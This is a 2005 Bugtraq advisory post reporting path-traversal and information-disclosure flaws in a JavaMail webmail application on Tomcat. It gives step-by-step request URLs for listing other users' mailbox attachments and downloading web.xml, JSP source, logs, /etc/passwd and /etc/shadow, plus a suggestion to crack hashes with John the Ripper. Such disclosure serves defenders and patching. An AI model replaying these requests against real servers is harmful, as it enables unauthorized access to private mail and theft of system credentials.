Bugtraq mailing list archives
Javamail Multiple Information Disclosure Vulnerabilities
From: Ricky Latt <ygnboyz () gmail com>
Date: 25 May 2005 02:24:27 -0000
Javamail Multiple Information Disclosure Vulnerabilities
May 25, 2005 Yangon, Myanmar.
Vulnerable Systems:
* JavaMail API 1.3
* JavaMail API 1.2
* JavaMail API 1.1.3
Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows
Failed to restrict to accessing other directory and files in ReadMessage.jsp
File Name:<%=mp.getFileName()%><br>
Type: <%=abc.getContent_Type()%><br>
Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" +
abc.getFileName() %>" target="_new"> download </a><br>
<%=abc.getFilePath() + "/" + abc.getFileName() %>"
It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()
1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information
1. Open specific mailbox attachment
When user download message from Javamail domain from webmail, attacker may notice URL
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user () example
com/messageid123@user/filename.extension
Then noticed URL lead to /var/folders so tried to switched folders.
http://example.com/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user
But got errors. So finally when reached to this URL
http://example.com/mailboxesdir/user () example com/
Its made listing of user () example com attachments are there.
Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to
get attachments listing.
http://example.com/mailboxesdir/user2 () example com/
http://example.com/mailboxesdir/user3 () example com/
2. Download configuration information of javamail
And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually
web browser got the redirect name
http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user () example
com/messageid123@user/filename.extension
This information lead to get web.xml
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
Which give configuration information of javamail
Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
3. Target machine Root/Admin Compromise
In UNIX /etc/passwd and /etc/shadow are important folder which
A little bit curious and look in web browser typing that
http://example.com/Download?/etc/passwd
example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
Then Crack Unix password files with John the Ripper.
John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the
ripper'.
http://example.com/Download?/etc/shadow
root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::
http://example.com/Download?/etc/group
/etc/group file:
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:
When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker
may do Website defacement, database altering, stealing and more.
4. Download server information
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done
.
By
Thet Aung Min Latt thetaung () gmail com
http://thetaung.amyanmar.com
Current thread:
- Javamail Multiple Information Disclosure Vulnerabilities Ricky Latt (May 24)
